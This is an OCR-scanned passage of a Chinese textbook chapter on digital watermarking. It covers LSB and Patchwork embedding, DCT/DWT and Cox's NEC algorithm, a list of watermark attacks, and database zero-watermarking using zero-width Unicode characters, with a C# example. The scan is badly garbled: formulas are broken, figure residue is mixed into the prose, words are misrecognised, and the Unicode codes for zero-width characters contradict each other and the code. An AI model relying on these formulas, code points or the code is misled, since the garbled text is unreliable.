
明 水 印 图 像 在 载体 图 像 中 的 嵌入 提取 有 空域 算法 、 频 率 变 
换 域 算法 等 。 

1. 空域 算法 

首先 把 一 个 密 钥 输 入 到 一 个 mm 序列 发 生 器 来 产生 水 印信 号 ,再 将 此 wm 序列 重新 排列 成 
二 维 水 印信 号 , 按 像素 点 逐一 插入 到 原始 声音 、 图 像 或 视频 等 信号 中 作为 水 印 , 即 将 数字 水 
印 通过 某 种 算法 直接 全 加 到 图 像 等 信号 的 空间 域 中 。 





图 8-21 含 明 水 印 图 像 
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空域 数字 水 印 技术 的 优点 是 算法 简单 、 速 度 快 、 容 易 实现 ,几乎 可 以 无 损 地 恢复 载体 图 
像 和 水 印信 息 。 其 缺点 是 太 脆弱 ,常用 的 信号 处 理 过 程 , 如 信号 的 缩放 、 剪 切 等 ,都 可 以 破坏 
水 印 。 典 型 空域 方法 有 最 低 有 效 位 方法 (Least Significant Bits,LSB)、Patchwork 法 和 文 
档 结构 微调 方法 。 

(1) 随机 位 置 嵌 入 提取 数字 水 印 算法 : 首先 使 用 随机 函数 生成 与 水 印 图 像 像 素 个 数 相 
同 的 不 重复 整数 ,然后 将 其 转换 为 载体 图 像 的 位 置 坐标 ,在 对 应 位 置 谋 入 水 印 图像 ,像素 颜 
色 取 载体 图 像 的 颜色 隐藏 水 印 图 像 的 存在 。 

这 是 一 种 空域 算法 ,直接 在 载体 图 像 空间 域 操 作 , 因 此 需要 确定 嵌入 位 置 。logistic 混 

序列 具有 伪 随 机 性 和 初 值 敏感 性 ,常用 于 确定 水 印 嵌入 位 置 。 
logistic: Xu = pXi(1— Xi), Xi € (0,1), jE (0,4) 

使 用 logistic 混沌 序列 生成 嵌入 位 置 处 理 流 程 如 图 8-22 所 示 。 图 8-23 为 扩大 函数 值 
1000 倍 取 整 的 结果 。 图 8-24 为 排序 .去 重 的 结果 ,假定 该 结果 序列 为 N 二 {n,ns,…) ,载体 
图 像 宽 带 为 ww, 则 xz; 二 nn; mod w,yi 二 int(n/w), (xi,yi) 即 为 水 印 租 入 位 置 。 例 如 w=5， 
让 一 11,zi 一 1,y% 一 2, 则 (1,2) 就 是 一 个 嵌入 点 。 


参数 | -| 预 迁 代 | | 混沌 序列 | | 按 数据 量 | | 作为 饰 选 
初始 化 200 次 去 重 扩大 数据 项 


图 8-22 logistic 混沌 序列 处 理 流程 









| 生成 混沌 
序列 






























输入 初 值 (0, 1]: 0.98 输入 参数 (0,4] : 3.998 排序 后 的 结果 : 2 2 2 4 5 9 10 11 13 16 21 21 
原始 值 ， 0. 407957 0.965629 22 27 34 34 36 36 4 51 58 65 81 84 
0.460109 0.99313 84 88 105 106 130 1 141 142 159 
0. A775D 0. 940726 163 176 196 214 219 4 298 309 310 
有 5 322 378 381 407 4 460 464 466 


473 484 488 492 495 506 5 545 547 582 591 

630 674 679 684 692 712 732 740 758 768 782 

819 836 851 855 856 862 870 874 877 931 940 

943 965 966 972 979 985 989 990 991 991 993 
94 6 998 998 999 999 999 

p :245910111316212227 






结果 
34 36 41 42 46 51 58 65 81 84 88 105 106 
130 132 134 141 142 159 ed 176 196 214 219 







0. 473586 0. 996 0.0131082 0. 

0.196081 0.630218 0.931706 0. 254391 … 
原始 值 扩 大 1000 倍 后 取 : 
27 105 378 940 222 6 
159 535 994 21 84 







60 464 466 473 484 488 492 495 
5 547 582 591 630 674 679 684 692 
740 758 768 782 819 836 851 855 856 





141 484 998 5 22 8 32 874 4 440 985 58 219 
684 862 473 996 13 51 196 630 931 254 … 











862 870 877 931 940 943 965 966 972 979 985 
989 990 991 993 994 996 998 999 





图 8-23 ”logistic 函数 值 


图 8-24 logistic 函数 值 去 重 、 排 序 结 果 





(2) LSB 算法 : LSB 算法 将 信息 嵌入 到 随机 选择 的 图 像 点 中 最 不 重要 的 像素 位 上 , 因 
为 改变 这 一 位 置 对 载体 图 像 的 品质 影响 最 小 。 

由 于 使 用 了 图 像 不 重要 的 像素 位 ,算法 的 鲁 棒 性 差 ,水 印信 息 很 容易 为 滤波 、 图 像 量 化 、 
几何 变形 的 操作 破坏 。 由 于 水 印信 号 被 安排 在 了 最 低位 上 ,所 以 不 会 被 人 的 视觉 或 听觉 所 
察觉 ,保证 了 内 入 水 印 是 不 可 见 的 。 

LSB 算法 是 典型 的 空域 算法 ,通过 对 空域 的 LSB 做 替换 实现 水 印 图 像 嵌 入 提取 ,用 来 
替换 LSB 的 序列 就 是 需要 加 入 水 印 图 像 对 应 的 序列 。 

LSB 算法 是 一 种 简单 而 实用 的 信息 隐藏 算法 。 灰 度 图 像 每 一 个 像素 点 的 取 值 为 0 一 255， 
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因此 每 个 像素 可 以 用 8 比特 来 表示 。 各 个 像素 位 置 相 同 的 位 形成 了 一 个 平面 ,定义 为 位 平 
面 。 从 像素 的 位 平面 1 到 位 平面 8 依次 为 最 不 重要 位 平面 到 最 重要 位 平面 。 显 然 位 平面 
8 与 原始 图 像 最 相似 ,改变 它 对 原始 图 像 影响 最 大 ; 位 平面 1 与 原始 图 像 最 不 相似 ,改变 它 
对 原始 图 像 影响 最 小 。 图 8-25 为 一 幅 512X512 像素 大 小 的 灰 度 图 像 的 各 个 位 平面 。 


原始 图 像 位 平面 8 位 平面 7 位 平面 6 


图 8-25 载体 图 像 的 各 个 位 平面 


LSB 水 印 嵌 入 方法 为 首先 获取 水 印 图 像 的 十 进 制 像素 值 ,转换 为 二 进 制 数据 ; 然后 用 
二 进 制 数据 的 每 一 比特 替换 与 之 相对 应 的 载体 图 像 的 最 低 有 效 位 ; 与 之 相对 应 ,水 印 提取 
方法 为 首先 获取 含水 印信 息 的 二 进 制 数据 ,转换 为 十 进 制 像素 值 , 然 后 还 原 输 出 水 印 图 像 。 

LSB 嵌入 具体 实现 方法 是 通过 两 个 for 循环 嵌 套 ,遍历 水 印 图 像 的 每 一 个 像素 ,设置 一 
个 char 类 型 的 一 维 数组 ,将 像素 值 小 于 125 的 对 应 数组 元 素 置 为 1 ,像素 值 大 于 125 的 对 应 
数组 元 素 置 为 0; 然后 访问 载体 图 像 ,使 用 一 维 数组 的 每 一 比特 替换 相对 应 的 载体 数据 最 低 
有 效 位 。 

LSB 提取 具体 实现 方法 是 通过 两 个 for 循环 的 嵌 套 ,访问 含水 印 载体 图 像 前 n(n 为 含 
水 印 图 像 像素 个 数 ) 个 像素 ,将 每 个 像素 转换 为 二 进 制 , 取 其 最 低 有 效 位 。 然 后 再 将 取 到 的 
最 低 有 效 位 所 对 应 的 像素 值 赋 给 IplImage 变量 还 原 输出 水 印 图 像 。 

(3) 利用 像素 的 统计 特征 将 信息 嵌入 像素 的 亮度 值 中 。Patchwork 算法 方法 是 随机 选 
择 N 对 像素 点 〈ai ,6;) ,然后 将 每 个 a; 点 的 亮度 值 加 1, 每 个 5b; 点 的 亮度 值 减 1, 这 样 整个 


图 像 的 平均 亮度 保持 不 变 。 检 测 时 ,计算 S= 三 (a; 一 5;) ,如 果 这 个 载体 确实 包含 了 一 个 


水 印 ,就 可 以 预计 这 个 和 为 2 ,否则 它 将 近似 为 堆 。 

适当 地 调整 参数 ,Patchwork 方法 对 JPEG 压缩 、FIR 滤波 以 及 图 像 裁剪 有 一 定 的 抵抗 
力 , 但 该 方法 嵌入 的 信息 量 有 限 。 为 了 嵌入 更 多 的 水 印信 息 ,可 以 将 图 像 分 块 , 然 后 对 每 一 
个 图 像 块 进行 嵌入 操作 。 

(4) 文档 结构 微调 方法 是 在 通用 文档 中 隐藏 特定 二 进 制 信息 的 技术 。 如 轻微 改变 文档 
的 字符 或 图 像 行距 .水平 间距 ,或 改变 文字 特性 等 来 完成 水 印 戏 入 。 这 种 水 印 能 抵御 攻击 ， 
其 安全 性 主要 靠 隐 蔽 性 来 保证 。 

一 个 成 功 案例 是 1981 年 ,英国 内 阁 秘 密 文件 的 图 像 被 翻印 在 报纸 上 登 出 。 传 闻 事 先 玛 
格 丽 特 。 撒 切 尔 夫人 给 每 位 部 长 分 发 了 可 唯一 鉴别 的 文件 副本 。 每 份 副本 有 着 不 同 字 间 
距 , 用 于 确定 收 件 人 的 身份 信息 ,用 这 种 方法 查 出 了 泄密 者 。 

2. 频率 变换 域 算 法 

该 类 算法 中 大 部 分 水 印 算法 采用 了 扩展 频谱 通信 (spread spectrum communication) 技 
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术 , 其 基本 思想 是 先 对 图 像 或 声音 信号 等 信息 进行 某 种 变换 ,在 变换 域 上 内 嵌入 水 印 , 然 后 
经 过 反 变换 而 成 为 含水 印 的 输出 ; 检测 水 印 时 ,也 要 首先 对 信号 做 相应 的 数学 变换 ,然后 通 
过 相关 运算 检测 水 印 。 这 些 变换 包括 离散 余弦 变换 (DCT)、 小 波 变换 (CDWT)、 傅 氏 变换 
(FT 或 FFT) 等 。 其 中 基于 分 块 的 DCT 是 最 常用 的 变换 之 一 ,现在 所 采用 的 静止 图 像 压 缩 
标准 JPEG 也 是 基于 分 块 DCT 的 。 

算法 实现 过 程 为 : 先 计算 图 像 的 离散 余弦 变换 (DCT) ,然后 将 水 印 释 加 到 DCT 域 中 
幅 值 最 大 的 前 个 系数 上 (不 包括 直流 分 量 ) ,通常 为 图 像 的 低频 分 量 。 

车 DCT 系数 的 前 & 个 最 大 分 量 表示 为 卫 ={ d;} (i 二 1,…,k) ,水 印 是 服从 高 斯 分 布 的 
随机 实数 序列 W ={ wi} (i 二 1,…,k) ,那么 水 印 的 嵌入 算法 为 4d; 二 d;(1 十 aXw;) ,其 中 常 
数 a 为 尺度 因子 ,控制 水 印 添加 的 强度 。 然 后 用 新 的 系数 做 反 变换 得 到 水 印 图 像 T。 

解码 函数 则 分 别 计算 原始 图 像 了 和 水 印 图 像 1" 的 离散 余弦 变换 ,并 提取 散 入 的 水 印 
W"* ,再 做 相关 检验 以 确定 水 印 是 否 存在 。 

图 像 的 频 域 空间 中 可 以 嵌入 大 量 的 比特 而 不 引起 可 察觉 的 降 质 ,当选 择 改变 中 频 或 低 
频 分 量 ( 除 去 直流 分 量 ) 来 加 入 水 印 时 ,和 鲁 棒 性 还 可 大 大 提高 。 

离散 余弦 变换 (Discrete Cosine Transform, DCT) 和 FFT 变换 都 属于 变换 压缩 方法 
(Transform Compression) ,变换 压缩 的 一 个 特点 是 将 从 前 密度 均匀 的 信息 分 布 变换 为 密度 
不 同 的 信息 分 布 。 在 图 像 中 ,低频 部 分 的 信息 量 要 大 于 高 频 部 分 的 信息 量 ,尽管 低频 部 分 的 
数据 量 比 高 频 部 分 的 数据 量 要 少 得 多 。 例 如 ,删除 掉 占 50% 存 储 空间 的 高 频 部 分 ,信息 量 
的 损失 可 能 还 不 到 5%。 

在 图 像 处 理 中 ,每 幅 图 像 都 会 被 切 成 8X8 的 小 块 , 块 的 大 小 可 以 是 任意 ,只 是 因为 历史 
原因 人 们 习惯 于 切 为 8X8 的 块 。 二 维 的 图 像 处 理 与 一 维 的 信号 处 理 原 理 是 一 致 的 ,只 是 一 
些 计算 公式 不 一 样 ,在 二 维 图 像 中 , 基 函 数 的 公式 为 : 

正 变换 : 


有 2 开 x 
F.(p.v) = ———c (pc(v) (zsy)cos|ss C27 l)plecoslar 29 1)v 
加 rr ] ] 


2N 2M 


z=0 y=0 








M-1 N-1 
2 工 by 
和 2 一 国 pe A 生 S (2z 十 1) cos |——(2 十 1) 
f(r,y) 本 2 Ze (pv)cos 2N ‘27 4]eos 3M > "| 


EL 

c(z)= Fz 0 

1， z=1,2,…,N—1 

公式 中 zx 和 > 指 像素 在 空间 域 ( 对 应 一 维 的 时 间 域 ) 的 坐标 ,wu 和 w 指 基 函数 频率 域 中 
的 坐标 。 这 个 基 函 数 公 式 基 于 8X8 的 块 ,x,y, u,v 的 取 值 范围 都 是 0 一 7。 

如 果 Fa 一 由) 一 Fe 一 这) 过, 则 嵌入 1 ,否则 嵌入 0, 不 满足 关系 式 的 系数 值 通过 
加 入 随机 噪声 进行 修改 。 

图 像 经 DCT 变换 后 ,低频 信息 集中 在 矩阵 的 左上 和 角 ,高 频 信息 则 向 右 下 角 集 中 。 直 流 
分 量 在 [0,0] 处 ,[0,1] 处 的 基 函 数 在 一 个 方向 上 是 一 个 半 周 期 的 余弦 函数 ,在 另 一 个 方向 上 
是 一 个 常数 。[1,0] 处 的 基 函 数 与 [0,1] 类 似 , 只 不 过 方向 旋转 了 90"。 图 8-26 为 原 图 ,图 8-27 
是 图 8-26 的 DCT 示意 图 。 
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图 8-26 原 图 图 8-27 DCT 示意 图 


DCT 反 变换 (Inverse DCT) 更 为 容易 ,将 频率 域 中 的 基 函 数 分 别 与 对 应 的 振幅 
(spectrum) 相 乘 并 累加 , 即 可 得 到 相应 的 空间 域 元 素 的 值 。 

离散 小 波 变换 (Discrete Wavelet Transform) : 在 变换 的 每 一 层次 ,图 像 都 被 分 解 为 
4 个 四 分 之 一 大 小 的 图 像 ,它们 都 是 由 原 图 与 一 个 小 波 基 图 像 的 内 积 后 ,再 经 过 在 行 和 列 方 
向 进行 2 倍 的 间隔 抽样 而 生成 的 ,如 图 8-28 所 示 。 



































(a) 原 图 (b) 第 一 层 (c) 第 二 层 
图 8-28 DWT 示 意图 


该 方法 即使 当 水 印 图 像 经 过 一 些 通用 的 几何 变形 和 信和 号 处 理 操作 而 产生 比较 明显 的 变 
形 后 仍然 能 够 提取 出 一 个 可 信赖 的 水 印 副本 。 

一 个 简单 改进 是 不 将 水 印 嵌 入 到 DCT 域 的 低频 分 量 上 ,而 是 嵌入 到 中 频 分 量 上 以 调 
节 水 印 的 鲁 棒 性 与 不 可 见 性 之 间 的 矛盾 。 另 外 ,还 可 以 将 数字 图 像 的 空间 域 数据 通过 离散 
傅 里 叶 变 换 (DFT) 或 离散 小 波 变 换 (DWT) 转 化 为 相应 的 频 域 系数 ; 其 次 ,根据 待 隐藏 的 信 
息 类 型 ,对 其 进行 适当 编码 或 变形 ; 再 次 ,根据 隐藏 信息 量 的 大 小 及 其 相应 的 安全 目标 , 选 
择 某 些 类 型 的 频 域 系 数 序列 (如 高 频 或 中 频 或 低频 ); 再 次 ,确定 某 种 规则 或 算法 ,用 待 隐藏 
的 信息 的 相应 数据 去 修改 前 面 选 定 的 频 域 系 数 序 列 ; 最 后 ,将 数字 图 像 的 频 域 系 数 经 相应 
的 反 变换 转化 为 空间 域 数据 。 

该 类 算法 的 隐藏 和 提取 信息 操作 复杂 ,隐藏 信息 量 不 能 很 大 ,但 抗 攻击 能 力 强 , 很 适合 
于 数字 作品 版 权 保护 的 数字 水 印 技术 中 。 

3. 压缩 域 算法 

水 印 检测 与 提取 直接 在 压缩 域 数据 中 进行 。 基 于 JPEG、MPEG 标准 的 压缩 域 数字 水 
印 系 统 不 仅 节省 了 大 量 的 完全 解码 和 重新 编码 过 程 ,而 且 在 数字 电视 广播 及 VOD(Video 
on Demand) 中 有 很 大 的 实用 价值 。 相 应 地 ,水 印 检 测 与 提取 也 可 直接 在 压缩 域 数 据 中 
进行 。 

对 于 输入 的 MPEG-2 数据 流 而 言 , 它 可 分 为 数据 头 信 息 、 运 动向 量 ( 用 于 运动 补偿 ) 和 
DCT 编码 信号 块 3 部 分 ,算法 对 数据 流 最 后 一 部 分 数据 进行 改变 ,其 原理 是 : 
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首先 对 DCT 编码 数据 块 中 每 一 输入 的 Huffman 码 进 行 解 码 和 逆 量 化 ,以 得 到 当前 数 
据 块 的 一 个 DCT 系数 ; 

其 次 ,把 相应 水 印信 号 块 的 变换 系数 与 之 相 加 ,从 而 得 到 水 印 释 加 的 DCT 系数 ,再 重 
新 进行 量化 和 Huffman 编码 。 

最 后 ,对 新 的 Huffman 码 字 的 位 数 与 原来 的 无 水 印 系 数 的 码 字 no。 进行 比较 ,只 在 
m 不 大 于 no 的 时 候 , 才 能 传输 水 印 码 字 ,否则 传输 原 码 字 ,这 就 保证 了 不 增加 视频 数据 流 
位 率 。 

该 方法 有 一 个 问题 值得 考虑 , 即 水 印信 号 的 引入 是 一 种 引起 降 质 的 误差 信号 ,而 基于 运 
动 补偿 的 编码 方案 会 将 一 个 误差 扩散 和 累积 起 来 ,为 解决 此 问题 ,该 算 法 采取 了 漂移 补偿 的 
方案 来 抵消 因 水 印信 号 的 引入 所 引起 的 视觉 变形 。 

4. NEC 算法 

算法 由 NEC 实验 室 的 Cox 等 人 提出 ,该 算法 在 数字 水 印 算法 中 占有 重要 地 位 。 

实现 方法 是 : 首先 以 密 钥 为 种 子 来 产生 伪 随 机 序列 ,该 序列 具有 高 斯 N(0,1) 分 布 , 密 
钥 一 般 由 作者 的 标识 码 和 图 像 的 Hash 值 组 成 ; 其 次 对 图 像 做 DCT 变换 ,最 后 用 伪 随 机 高 
斯 序列 来 调制 ( 释 加 ) 该 图 像 除 直 流 (DC) 分 量 外 的 1000 个 最 大 的 DCT 系数 。 

该 算法 具有 较 强 的 鲁 棒 性 、 安 全 性 、 透 明 性 等 。 由 于 采用 特殊 的 密 钥 , 因 此 可 防止 恶意 
攻击 ,而且 该 算法 还 提出 了 增强 水 印 鲁 棒 性 和 抗 攻击 算法 的 重要 原则 , 即 水 印信 号 应 该 嵌入 
源 数据 中 对 人 感觉 最 重要 的 部 分 ,这 种 水 印信 号 由 独立 同 分 布 随机 实数 序列 构成 , 且 该 实数 
序列 应 该 具有 高 斯 分 布 N(0,1) 的 特征 。 

5. 生理 模型 算法 

生理 模型 包括 人 类 视觉 系统 (Human Visual System,HVS) 和 人 类 听觉 系统 (Human 
Auditory System,HAS) 。 利 用 视觉 模型 的 基本 思想 是 利用 从 视觉 模型 导出 的 JND(Just 
Noticeable Difference) 描 述 来 确定 在 图 像 的 各 个 部 分 所 能 容忍 的 数字 水 印信 号 的 最 大 强 
度 , 从 而 能 避免 破坏 视觉 质量 。 也 就 是 说 ,利用 视觉 模型 来 确定 与 图 像 相 关 的 调制 掩 模 , 然 
后 再 利用 其 来 插入 水 印 。 这 一 方法 同时 具有 好 的 透明 性 和 和 鲁 棒 性 。 


8.3.4 数字 水 印 攻击 方法 


(1) 简单 攻击 : 也 可 称 为 波形 攻击 或 噪声 攻击 ,就 是 通过 对 水 印 图 像 进行 某 种 操作 , 削 
弱 或 删除 嵌入 的 水 印 。 

(2) 同步 攻击 : 试图 使 水 印 的 相关 检测 失效 ,或 使 恢复 嵌入 的 水 印 成 为 不 可 能 。 这 类 
攻击 的 一 个 特点 是 水 印 实际 上 还 存在 于 图 像 中 ,但 水 印 检测 函数 已 不 能 提取 水 印 或 不 能 检 
测 到 水 印 的 存在 。 

(3) 迷惑 攻击 : 就 是 试图 通过 伪造 原始 图 像 和 原始 水 印 来 迷惑 版 权 保护 。 

(4) 删除 攻击 : 就 是 针对 某 些 水 印 方法 通过 分 析 水 印 数据 , 穷 举 水 印 密 钥 , 估计 图 像 中 
的 水 印 ,然后 将 水 印 从 图 像 中 分 离 出 来 ,并 使 水 印 检测 失效 。 

(5) 协议 攻击 : 协议 攻击 的 基本 思想 是 盗版 者 在 已 加 入 水 印 版 权 的 图 像 中 加 入 自己 的 
水 印 ,并 声称 该 图 像 的 所 有 权 是 属于 他 的 。 
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8.4 数据 库 数字 水 印 


数据 库存 储 的 数据 资源 中 蕴藏 了 巨大 的 社会 价值 和 经 济 价值 ,其 知识 产权 受 法 律 保护 。 
数据 库 盗 版 行为 严重 损害 数据 库 所 有 者 的 知识 版 权 和 社会 信誉 ,给 数据 库 所 有 者 造成 了 巨 
大 的 经 济 损失 ,已 引起 世界 各 国 的 高 度 重视 。 

数据 库 数字 水 印 能 够 以 高 概率 判别 盗版 数据 库 版 权 归 属 ,保护 数据 库 知识 版 权 ,是 国际 
上 公认 的 解决 数据 库 版 权 问 题 的 有 效 方法 。 作 为 一 种 新 型 数据 库 数字 水 印 形式 ,数据 库 
零 水 印 通 过 随机 提取 宿主 数据 库 数 据 特 征 生成 数字 水 印 ,保存 于 第 三 方 认证 中 心 ; 检测 
时 通过 从 待 检 数 据 库 中 提取 数字 水 印 ,与 认证 中 心 存储 的 数字 水 印 相 比 较 判 断 数 据 库 版 
权 归 属 。 

数据 库 零 水 印 具 有 零 戏 入 和 不 可 见 的 优点 。 零 嵌入 解决 了 艇 入 式 数据 库 水 印 因 修改 宿 
主 数据 库 数据 做 入 水 印信 息 导 致 的 数据 误差 问题 ,保证 了 数据 库 数据 的 可 用 性 和 准确 性 ; 
不 可 见 实现 了 数据 库 零 水 印信 息 隐藏 ,解决 了 水 印信 息 可 见 性 和 安全 性 的 矛盾 ,保证 了 数据 
库 零 水 印 的 安全 性 。 因 此 数据 库 零 水 印 是 数据 库 水 印发 展 的 方向 。 

数据 库 零 水 印 形式 上 是 二 进 制 序列 , 因 而 存在 如 下 不 足 : 

(1) 缺乏 直观 .明确 的 含义 ,需要 进一步 与 版 权 信息 建立 关联 ,才能 实现 数据 库 版 权 保 
护 ,否则 水 印 二 进 制 序列 可 能 形成 二 义 性 从 而 导致 版 权 死 锁 , 进 而 引起 版 权 纠纷 。 这 严重 制 
约 着 数据 库 零 水 印 的 应 用 ,是 数据 库 零 水 印 研究 需要 解决 的 关键 问题 。 

(2) 二 进 制 取 0 或 1 的 概率 各 为 50% ,因而 修改 或 删除 水 印 对 检测 结果 的 影响 仅 为 实 
际 影 响 的 50% ,检测 结果 的 匹配 率 偏 高 ,可 信 度 偏 低 , 需 要 采取 措施 增加 检测 结果 的 可 


8.4.1 零 宽 度 不 可 见 字符 


如 图 8-29 所 示 ,在 Word 2003 文档 的 “实例 ”两 字 中 间 输 入 一 个 零 宽带 不 可 见 字 符 
(Zero Width Joiner,ZWJ) ,其 Unicode 编码 为 200C。 方 法 是 将 光标 移 到 在 “实例 ”两 字 中 
间 , 输 入 200C 后 按 Alt 十 X 键 ,此 过 程 中 我 们 的 眼睛 观察 不 到 任何 变化 ,而 且 加 入 该 字符 前 
后 字数 统计 没有 变化 ( 同 为 12) ,证 明 该 字符 宽度 为 零 , 实 现 了 *“ 零 "嵌入 。 





这 是 一 个 不 可 见 字符 的 实 财 。 [和 ex 到 -ES - 
BM | Se | pt | A | 


这 是 一 个 不 可 见 字符 的 实 网 。 [Ca md-|ES ~ 





























图 8-29 ZWJ 具有 零 宽 度 和 不 可 见 双重 属性 


接 下 来 将 光标 移动 到 “实例 ”两 字 左 边 ,屏幕 显示 字体 是 宋体 ; 按 一 次 右 箭头 键 ,光标 右 
移 到 “实例 ”两 字 中 间 , 屏 幕 显 示 字 体 仍 为 宋体 ; 再 按 一 次 右 箭头 键 ,会 发 现 光标 没有 移动 
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(因为 零 宽 度 ) ,但 是 屏幕 显示 字体 却 变 为 了 Calibri; 继续 按 一 次 右 箭头 键 ,光标 右 移 到 “ 实 
例 ” 两 字 右 边 , 屏 幕 显示 字体 重新 变 回 宋体 。 

这 个 实验 证 明 * 实 例 ? 两 字 中 间 确 实 存在 一 个 具有 字符 宽度 为 零 . 不 可 见 双重 特性 的 字 
符 ,进一步 的 实验 可 证 明 该 字符 对 Word 文档 所 有 排版 属性 均 无 任何 影响 。 

类 似 地 可 使 用 以 下 程序 选取 数据 库 中 某 一 特定 记录 ,在 其 中 任意 字符 型 数据 的 任意 位 
置 插入 ZWJ 作为 数字 水 印 ,结果 如 图 8-30 所 示 。 





Id -| 姓名 -| 年 龄 - 地 址 -| 成 绩 
1 张 默 末 54 深圳 市 福田 区 34 号 87 
2 李 婷 婷 48 华尔街 21 号 @ 22 
3 马 晓 起 22 香港 英皇 赠 193-209 15 
4 李 丽 傅 59 北京 市 海淀 区 蓝 旗 营 教 师 住宅 小 区 10- 39 


图 8-30 ZWJ 嵌入 数据 库 


string str = ""; 

OleDbConnection con = new OleDbConnection( @"Provider = Microsoft. Jet. OleDb. 4. 0;Data Source = 

"+ "E:\\my.mdb"); 

con. Open( ); 

string sql = "select [地 址 ] from my where id = 3"; 

OleDbCommand cmd = new OleDbCommand( sql,con); 

OleDbDataReader read = cmd. ExecuteReader(); 

if(read. Read( )) str = read.GetValue(2).ToString(); 

Console. WriteLine( str); 

read. Close( ); 

char s = (char)(8202); 

//8202 是 10 进 制 ,对 应 十 六 进 制 是 200A 

str = str + s; // 在 指定 字符 串 最 后 加 入 ZW 

string sqll = "update my set [地 址 ] =\" + str + "\" 

where [id] = 3"; 

OleDbCommand cmd1l = new OleDbCommand( sqll, con);cmdl.ExecuteNonQuery(); 

这 个 实验 证 明 由 于 ZWJ 宽度 为 零 .不 占 位 置 . 不 可 见 ,以 ZWJ 作为 水 印 符号 嵌入 数据 
库 字 符 型 字段 ,对 原 有 字符 型 数据 的 字符 串 长 度 等 任何 属性 无 影响 ,因此 从 用 户 的 角度 来 看 
该 水 印 是 不 可 见 的 ,满足 数据 库 零 水 印 具 有 不 可 见 和 零 宽度 的 本 质 特征 ,属于 数据 库 零 水 印 
的 范畴 。 

据 此 可 将 数据 库 零 水 印 概念 从 * 不 嵌入 数字 水 印 到 宿主 数据 库 ? 扩 展 为 “允许 嵌入 ZWJ 
到 宿主 数据 库 ”。 

数据 库 零 水 印 概念 的 扩展 : 实验 发 现 Unicode 编码 为 2000 一 200F 的 多 个 字符 同时 有 具 
有 零 宽 度 和 不 可 见 双重 特性 。 零 宽度 意味 着 该 字符 插入 字符 串 后 ,不 会 改变 原 字符 串 长 度 
等 任何 属性 ,不 会 引起 用 户 警觉 ,可 实现 * 零 "嵌入 ; 不 可 见 意味 着 该 字符 仅 能 被 计算 机 识 
别 , 眼 睛 很 难 察觉 。 

由 于 ZWJ 嵌 入 宿主 数据 库 后 不 影响 宿主 数据 库 数据 的 使 用 精度 和 可 用 人 性 ,不 会 引起 数 
据 误 差 , 具 有 不 可 见 性 ,因此 以 ZWJ 为 载体 ,将 具有 明确 .直观 含义 的 商标 图 案 等 版 权 图 像 
作为 水 印 不 可 见地 嵌入 宿主 数据 库 , 具 有 安全 性 和 隐蔽 性 ,可 解决 传统 数据 库 零 水 印 具有 二 
义 性 可 能 形成 版 权 死 锁 进而 引起 版 权 纠纷 的 关键 问题 ,是 对 数据 库 零 水 印 的 一 大 创新 突破 ， 
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成 功 实现 了 数据 库 零 水 印 的 盲 检 ,增强 了 数据 库 版 权 保护 的 强度 和 实用 性 。 

我 们 以 ZWJ 为 载体 ,将 具有 明确 直观 含义 的 商标 图 案 等 版 权 图 像 作为 数字 图 像 水 印 
不 可 见地 嵌入 宿主 数据 库 ,创新 提出 和 实现 了 基于 ZWJ 的 数据 库 版 权 图 像 零 水 印 算法 , 扩 
展 了 数据 库 零 水 印 概念 ,解决 了 传统 数据 库 零 水 印 具 有 二 义 性 可 能 形成 版 权 死 锁 进 而 引起 
版 权 纠纷 的 关键 问题 ; 通过 对 字符 型 数据 求 其 Unicode 编码 和 后 提取 特定 二 进 制 位 作为 传 
统 数据 库 零 水 印 ,解决 了 如 何 有 效 利 用 非 数值 型 数据 构造 数据 库 零 水 印 这 一 数据 库 零 水 印 
难题 ; 通过 采用 汉 明 码 构造 校 验 矩 阵 对 检测 结果 进行 纠 错 、 检 测 结果 多 数 表 决 等 方法 进 一 
步 提高 检测 结果 的 可 信 度 。 


8.4.2 基于 ZWJ 的 版 权 图 像 数据 库 零 水 印 算法 


为 了 增强 版 权 图 像 的 抗 攻击 性 ,在 版 权 图 像 数据 库 零 水 印 构造 时 对 版 权 图 像 先进 行 了 
预 处 理 一 一 位 交换 和 纠 错 编码 ; 相应 地 在 版 权 图 像 数据 库 零 水 印 检测 时 ,对 检测 出 的 版 权 
图 像 需 要 进行 解 预 处 理 才能 得 到 最 终 的 检测 版 权 图 像 。 

版 权 图 像 数据 库 零 水 印 嵌 入 算法 步骤 如 下 : 

(1) 生成 版 权 图 像 虚拟 和 矩阵。 获取 版 权 图 像 像素 矩阵 ,保存 为 数组 bufPic, 选 择 每 4 位 
作为 一 个 虚拟 像素 ,保存 为 数组 CCz,y) 。 

(2) 位 交换 。 顺 序 取 CCz,y) 之 值 , 若 z 十 y 为 偶数 , 先 将 CCz,y) 之 值 首 未 位 交换 , 然 
后 每 一 位 和 Sp(z 十 y 十 L) 异 或 ; 若 z 十 y 为 奇数 , 则 先 将 CCz,y) 之 值 的 每 一 位 和 Sp(z 十 
y 十 L) 进 行 异 或 ,然后 将 CCz,y) 首 末 位 交换 。 位 交换 后 的 图 像 虚拟 像素 矩阵 ,保存 为 数组 
By. LEE 

(3) 产生 校 验 矩阵 。 顺 序 取 BCz,y) 之 值 依 次 记 为 (zs ,riyzsyze), 用 zo 一 zzs 中 ze， 
zi 一 2 四 zi 中 zs,z 一 zxzs 中 zs 计算 3 位 校 验 码 (zo,ziyzs), 然 后 使 用 偶 校 验 的 奇偶 校 
验 码 生 成 z ,以 (zo ,zi ,zs,7z1)4 位 一 组 构成 对 应 的 校 验 矩 阵 。 

(4) 标记 水 印 位置 。 使 用 混沌 参数 生成 混沌 序列 ,通过 去 重 数据库 容量 扩展 后 选取 字 
符 型 字段 作为 水 印 嵌 入 位 置 , 记 为 数组 S。 

(5) 异 或 操作 。 从 宿主 数据 库 中 依次 提取 S[ 站 标记 位 置 的 字段 值 , 写 入 info[ 门 。 按 照 
传统 数据 库 零 水 印 嵌 入 算法 ,将 info[ 门 转换 成 二 进 制 , 提 取 第 B 位 记 为 d[ 门 。 将 bufPic[ 站 
与 d[ 详 异 或 后 的 值 写 入 bufPic[i。 

(6) 嵌入 ZWJ。 依 次 从 宿主 数据 库 中 提取 与 SC 标记 位 置 对 应 的 info[ 让 .bufPic[ 让 。 

车 bufPic[ 门 值 为 0, 则 在 对 应 的 info[ 让 中 加 入 Unicode 编码 为 200C 的 ZWJ; 若 
bufPic[ 门 值 为 1, 则 在 对 应 的 info[ 门 中 加 入 Unicode 编码 为 200D 的 ZWJ ,然后 将 更 新 后 的 
info[ 丫 写 回 宿主 数据 库 。 

